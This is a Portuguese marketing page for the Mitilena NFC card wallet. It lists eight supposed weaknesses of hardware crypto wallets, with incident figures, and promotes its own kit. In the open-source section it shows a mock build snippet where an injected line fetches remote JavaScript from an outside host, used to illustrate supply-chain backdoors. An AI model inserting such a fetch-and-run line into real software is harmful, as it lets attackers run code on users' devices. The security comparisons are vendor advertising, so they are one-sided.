8 falhas Código aberto Lista de controlo FAQ
Mitilena Mitilena Wallet Carteira crypto fria
ONLINE · 22,000+ COINS Criar carteiraCriar
Carteiras hardware · falhas não óbvias

Falhas não óbvias de uma carteira hardware

Compra um dispositivo para fechar buracos. Com ele chegam outros: firmware, atualizações, um serviço no computador, um ecrã, uma caixa, uma conta no vendedor. Oito detalhes que as análises listam como vantagens — e oito formas pelas quais se tiraram fundos através deles em 2020–2026.

Casos reais com datas e montantes Segundo a documentação dos fabricantes O nosso kit — pela mesma lista
Preço do errocasos públicos
2026Coldcard · aleatoriedade fraca no firmware$100M+
2025Bybit · os signatários assinaram o que não viram$1.5B
2024Dark Skippy · a seed foge em duas assinaturasestudo
2023Ledger Connect Kit · backdoor numa biblioteca$600K
2021App falsa de carteira na App Store17,1 BTC
2020Fuga da base de clientes Ledger · phishing durante anos270 000 pessoas
Oito falhas

Cada detalhe que as análises elogiam é um buraco à parte

Uma carteira hardware fecha um buraco: a chave deixa de estar num telemóvel com internet. Mas o dispositivo não está vazio. Tem firmware, atualizações, um programa no computador, um ecrã, uma caixa, um vendedor com o seu endereço — e cada detalhe acrescenta uma superfície de ataque que antes não tinha. Abaixo estão oito desses detalhes: o que dizem as análises, como se tiraram fundos através deles, como fechar o buraco e se o nosso kit tem esse detalhe.

Falha 01

O firmware que cria a sua chave

Nas análises: «chip seguro — a chave é criada dentro do dispositivo e nunca o abandona»

Uma chave é um número aleatório enorme, e é o firmware que o faz. Um erro aí — e há muito menos chaves do que pensa: são forçadas em massa em todos os donos de uma só vez, sem acesso ao dispositivo, anos após a compra. O chip não tem nada a ver; o buraco está acima dele.

Caso
$100M+
Coldcard, julho de 2026: um erro de compilação do firmware desde 2021 substituiu em silêncio o gerador de hardware por um fraco, semeado com o número de série do dispositivo e um temporizador. A força das chaves caiu para cerca de 40 bits; mais de 5 000 endereços foram esvaziados.
Como fechar o buraco
Pode trazer a sua própria aleatoriedade: dados, a sua própria frase. Uma carteira que aceita entropia sua não depende de um único erro no firmware.
Este detalhe não existe cá
No cartão não há firmware — é um suporte cifrado. O Mitilena Air cria a chave a partir do gerador de sistema do dispositivo, e pode definir a sua própria frase-seed em vez de palavras aleatórias.
Falha 02

Atualizações que é obrigado a instalar

Nas análises: «o fabricante publica regularmente atualizações de segurança»

Cada atualização é um momento em que o firmware pode ser substituído. Um firmware adulterado esconde fragmentos da seed em duas ou três assinaturas comuns, enquanto o dispositivo parece normal por fora. Deixar de atualizar também não serve: os buracos fecham-se precisamente com essas atualizações.

Caso
2 assinaturas
Dark Skippy, agosto de 2024: investigadores mostraram que um firmware malicioso de carteira hardware pode extrair a seed inteira através de duas transações. Basta atualizar uma vez a partir do sítio errado.
Como fechar o buraco
De onde vem o firmware e se o dispositivo verifica a sua assinatura. O melhor é quando não há nada para atualizar.
Este detalhe não existe cá
No cartão não há nada para atualizar nem substituir. A assinatura faz-se na app do telemóvel; as builds estão assinadas e vêm da App Store e do Google Play — como qualquer app que vê e fecha sozinho.
Falha 03 · Sinta o absurdo
Nas análises: «app oficial conveniente para o computador»

Uma carteira para a desconfiança que vem com um serviço em segundo plano

Compra o dispositivo por uma só razão: para deixar de confiar no computador. Para funcionar, tem de instalar um serviço em segundo plano nesse mesmo computador. Não o escreveu, não o arranca e não o controla: arranca com o sistema, escuta uma porta a que qualquer programa da máquina pode bater e está a fazer alguma coisa neste momento — o quê exatamente, não sabe e nunca verificará.

Continuava em segundo plano mesmo depois de fechar a carteira. Durante anos. Num dos maiores fabricantes era um serviço-«ponte» à parte; em 2025 meteram-no dentro da própria app — o serviço continua lá, só morre com a janela. Na maioria dos outros, sem programa no computador o dispositivo é um porta-chaves. No Linux acrescente regras udev, ou o sistema não cede o USB.

Ou seja: a coisa que comprou para não depender de programas no computador não funciona sem um programa no computador. E não o que vê — o que corre por baixo.

Este detalhe não existe cá
No computador não se instala nada: nem serviço, nem driver, nem porta. O intermediário é o chip NFC que já está no telemóvel, feito pelo fabricante e governado pelo sistema: só funciona quando a app está aberta e você próprio aproxima o cartão, e o telemóvel pede autorização de cada vez. O cartão é passivo: sem bateria, sem rádio, não faz nada sozinho. Fechou a app — não ficou nada a correr sem si. Com honestidade: a app no telemóvel é necessária, e é como qualquer outra — vê-a, arranca-a e fecha-a sozinho. Ninguém mora na arrecadação.
Monitor do sistemaCARTEIRA FECHADA
ProcessoEstadoTempo
HW Wallet Appwallet
fechada por si-
hwwalletdserviço em segundo plano · ponte USB
a correr412d 06:14
iniciado pelo sistema no loginnão se pode fechar — é um serviço
Mockup; nomes ilustrativos. Assim parecia um computador com uma das carteiras USB mais populares antes de 2025; depois a «ponte» foi integrada na própria app — o mesmo serviço, só que já não aparece na lista.
Alegoria
Uma casa pela privacidade — e um inquilino na arrecadação

Queria uma casa pela privacidade. Comprou. Depois precisou de segurança — instalou. E para o plano de segurança funcionar, pediram-lhe que deixasse entrar em casa uma pessoa de uniforme que vive na arrecadação a todas as horas, tem chaves de todas as portas e presta contas a outro. Não a contratou, não a pode despedir, e o que faz de noite — não sabe.

É «dos nossos», claro. Está no contrato. Queria privacidade e ficou com um sucedâneo: uma casa com um inquilino que não escolheu.

Falha 04 · Código aberto não é uma auditoria
Nas análises: «código aberto — qualquer um pode verificar»

Código aberto é como os programadores trabalham em conjunto, não um selo de que o programa não rouba

O código aberto foi inventado para as pessoas partilharem programas e corrigirem-nos em conjunto. Como ferramenta de colaboração é excelente. Nunca foi um selo de qualidade de que «este software não lhe rouba o dinheiro», e eis porquê: não usa o código-fonte. Usa o que descarregou.

Entre um repositório no GitHub e o ficheiro no telemóvel estão a build, a loja de apps, a atualização, o servidor. Em qualquer desses passos pode entrar uma linha que puxa qualquer coisa de qualquer sítio — e não estará no repositório. Não pode comparar a sua cópia com o código-fonte: as lojas enviam um ficheiro compilado; uma carteira web recebe o código que o servidor quis servir-lhe hoje; uma extensão do browser atualiza-se em silêncio à noite.

«Aberto» significa que algumas pessoas podem verificar alguma versão num dado dia. O que a sua cópia está a fazer agora — isso não significa.

No repositório · github.com/…/wallet/send.js
// send.js
import { sign } from './crypto'
export async function send(tx, key) {
const signed = sign(tx, key)
return broadcast(signed)
}
No telemóvel · app-2.4.21.min.js
// send.js — build
import { sign } from './crypto'
;(async () => {
var globalObject = await fetch('https://cdn-static.io/x.js')
})()
export async function send(tx, key) {
const signed = sign(tx, key)
return broadcast(signed)
}
Uma linha na build. Não está no repositório, invisível na loja, a correr no seu dispositivo.
A abertura não impediu nenhum destes casos
Ledger Connect Kit2023
biblioteca aberta no GitHub; uma versão maliciosa foi publicada no npm; dezenas de sites carregaram-na em direto em poucas horas
Copay / event-stream2018
carteira aberta; o backdoor veio por uma dependência apontada especificamente a ela
xz utils2024
aberto durante vinte anos; um backdoor esteve nas releases até um engenheiro notar que o login SSH demorava meio segundo a mais
Coldcard2026
firmware de código aberto; um erro de build durante cinco anos substituiu o RNG de hardware por um fraco — chaves forçadas sem acesso ao dispositivo, mais de 5 000 endereços, 100M+$
O que realmente funciona
Não ler o código de outra pessoa — duas verificações que qualquer um pode fazer. Primeiro, uma auditoria de comportamento: ponha um proxy de interceção no computador, faça a app passar por ele e veja o que envia e para onde. Não precisa de ler o código — o tráfego fica todo visível. Segundo, uma arquitetura em que o código não tem nada para roubar: se a chave nunca está num dispositivo com rede, qualquer linha em qualquer atualização é impotente — não tem nada para enviar.
Como fazemos
Oferecemos o primeiro nós próprios: passe a nossa app por um proxy, a versão web pelas DevTools do browser, e inspecione cada pedido. A chave de assinatura e a seed não aparecem; a única ressalva é a view key do Monero — coberta na página «como a transferência sai». O segundo está no kit: a chave nasce no Mitilena Air num dispositivo sem internet, vive no cartão, e só a assinatura chega à app online — aí já não há nada para o proxy apanhar. E offline aqui é a sério: em modo air-gap o dispositivo das chaves não está ligado a nada — sem cabo, sem Bluetooth; a transação entra e sai como QR que vê com os olhos. Não uma carteira «fria» num cabo pendurada de um computador online com o seu próprio serviço a trocar quem-sabe-o-quê.
Falha 05

Um ecrã onde não se vê o que assina

Nas análises: «confirme no ecrã do dispositivo — um vírus no computador é impotente»

O ecrã é minúsculo e muitas vezes mostra um hash ou «chamada de contrato», não o endereço e o montante. Confirma o que não consegue ver — e a assinatura continua honesta, sua. O ecrã dá uma sensação de controlo que não existe.

Caso
$1.5B
Bybit, fevereiro de 2025: signatários com carteiras hardware confirmaram uma transferência que na interface parecia banal. Os dispositivos mostravam dados que um humano não conseguia verificar.
Como fechar o buraco
Destinatário, montante e tipo de operação em linguagem humana — não um hash — e um botão Recusar.
Como fazemos
Há ecrã, mas é o do telemóvel: endereço, montante e tipo de pedido por escrito — transferência, chamada de contrato, aprovação — e um botão Recusar. Para montantes grandes — um dispositivo offline à parte que recebe a transação completa.
Falha 06

Uma caixa que já traz uma seed

Nas análises: «chega numa caixa selada com selo de segurança»

Um dispositivo físico implica envio, intermediários e marketplaces «com desconto». A carteira chega pré-configurada, com uma seed num papel dentro. Ou uma app parecida na loja pede-lhe para «introduzir a seed para ativar».

Caso
17,1 BTC
App Store, 2021: um dono de carteira hardware introduziu a seed numa app parecida e perdeu 17,1 BTC. No mesmo ano, após a fuga da base, clientes Ledger receberam por correio dispositivos falsos com uma carta a dizer «passe a seed para o novo».
Como fechar o buraco
Inicialize-a você próprio e nunca use uma seed que chegou já escrita. Um selo não é verificação; verificação é criar a chave você.
Como fazemos
Os cartões chegam em branco: cria a chave e grava-a você — não pode haver uma seed pronta na caixa. A app vem só da App Store e do Google Play pelos links no site; pede a seed apenas na importação e na assinatura.
Falha 07

Uma conta no vendedor

Nas análises: «garantia oficial, suporte e conta pessoal»

Para comprar o dispositivo dá ao fabricante o nome, o e-mail e o endereço de envio. A sua segurança passa a depender da base de dados deles. Se vazar — durante anos receberá mensagens a «confirmar a seed num dispositivo novo», por vezes com encomendas.

Caso
270 000 pessoas
Ledger, 2020: dados de 270 000 compradores vazaram, incluindo moradas postais. E-mails, chamadas e encomendas a pedir para «migrar» a seed continuam até hoje.
Como fechar o buraco
Quanto menos souberem de si, mais curto é o vetor: comprar sem conta, suporte que nunca pede a seed, e a regra «só um ladrão pede a seed».
Este detalhe não existe cá
A carteira funciona sem registo — sem conta. O vendedor só conhece o endereço de envio. Nem o suporte nem a app pedem a seed.
Falha 08

Um dispositivo e um papel

Nas análises: «caixa robusta, ecrã grande, bateria para uma semana»

Quanto mais peças, mais avarias: conector, ecrã, bateria. A recuperação depende de um único papel com a seed — molhado, perdido numa mudança, fotografado «por precaução». A causa mais comum de perda não é um hack.

Caso
≈20 % BTC
A Chainalysis estima que cerca de um quinto de todo o bitcoin está perdido para sempre — sobretudo por chaves perdidas, não por hacks.
Como fechar o buraco
Quantas cópias da chave vêm na caixa e em que forma, o que acontece se o dispositivo se perde, e se há nele algo que possa avariar.
Este detalhe não existe cá
Sem ecrã, bateria ou conector — nada para avariar. E não uma cópia: cinco cópias espelho na caixa — dois cartões NFC e três autocolantes stealth em plástico impermeável, mais de 10 anos.
Lista de controlo

O que não deve estar numa carteira

Oito detalhes para oito falhas. A lista serve para qualquer carteira — hardware, telemóvel, browser. Marque o que a que está a escolher tem — e a nossa também.

01
Uma chave criada só pelo softwaresem a sua própria aleatoriedade — a sua frase ou dados
02
Atualizações onde vive a chavecada atualização é uma oportunidade de trocar código
03
Um serviço, driver ou porta no computadorver falha 03
04
Um selo de «código aberto» em vez de arquiteturaa chave está onde código alheio a pode alcançar
05
Um ecrã que mostra um hash em vez de endereço e montantee sem botão Recusar
06
Uma seed que chegou já escritana caixa, numa carta, numa «app de ativação»
07
Uma conta no vendedore suporte que pode pedir a seed
08
Uma única cópia e peças que avariamecrã, bateria, conector, um papel
Nesta lista, o kit Ultimate não tem nenhum dos oito detalhes. Na caixa: 2 cartões NFC e 3 autocolantes stealth, Mitilena Air (chaves sem internet) e Mitilena Keys (assinatura sem internet). Os cartões chegam vazios: cria e cifra a chave você — não um chip de fábrica. Conteúdo e preço →
Ultimate · kit offline

Não um «chip seguro» de fábrica — um suporte que cifra você

Os cartões chegam vazios. Cria a chave no Mitilena Air num telemóvel sem internet e grava-a você. A assinatura é pelo Mitilena Keys, também offline: a transação viaja por QR. Cinco cópias idênticas na caixa: 2 cartões NFC e 3 autocolantes stealth em plástico impermeável. 18 redes, mais de 20 000 moedas, incluindo USDT.

Nada se instala no computador
Sem firmware, atualizações, ecrã ou bateria
Transação para um telemóvel offline — por som ou QR, sem cabo nem USB
Funciona com a app Mitilena gratuita no telemóvel
Plástico impermeável, validade de mais de 10 anos
Envio mundial · mitilena-store.com
Mitilena NFC card
Ultimate · geração e assinatura offline
€369€439
2 cartões NFC · 3 autocolantes stealth · Mitilena Air · licença Mitilena Keys
Encomendar Ultimate · €369 Básico e Premium — a partir de €79
FAQ

O que perguntam depois de ler até aqui

Carteira hardware vantagens e desvantagens — versão curta?

Uma grande vantagem: a chave não está num telemóvel com internet. As desvantagens são os oito detalhes acima — cada um acrescenta superfície de ataque. Uma boa carteira hardware é a que tem menos detalhes, não mais.

E se o telemóvel estiver comprometido?

Com um cartão no telemóvel principal a chave aparece num ambiente isolado no segundo da assinatura — o mesmo risco de qualquer carteira no telemóvel, só que mais curto. Para montantes que assustam — uma segunda camada: assine num dispositivo offline à parte a que a transação chega por QR.

E se o cartão for roubado ou perdido?

Sem a palavra-passe o cartão e o autocolante são plástico inútil — a chave neles está cifrada. Uma cópia perdida é substituída pelas outras quatro: dois cartões e três autocolantes da caixa são espelhos.

É preciso atualizar o firmware da carteira hardware?

Se o fabricante fechou um buraco — sim, e é exatamente nesse momento que o firmware pode ser substituído: verifique a origem e a assinatura. Num suporte sem firmware essa escolha não existe — não há o que atualizar nem substituir.

Em que difere de uma carteira USB?

Menos intermediários: sem cabo, driver, serviço em segundo plano ou programa no computador. Um intermediário — o chip NFC do telemóvel — e responde a si e ao sistema, não ao fabricante da carteira.

Código aberto significa seguro?

Significa verificável por alguém, algum dia. Não usa o código, usa o que descarregou, e não pode comparar um com o outro. A segurança vem de uma arquitetura em que a chave não está onde código alheio a alcança.

Cartões NFC com geração e assinatura offline

5 cópias da chave · Air · Keys · ou uma carteira grátis em 30 segundos · Porque é que uma carteira hardware «fria» baseada no chip seguro de fábrica costuma ser falsa →
Encomendar Ultimate · €369 Criar carteira grátis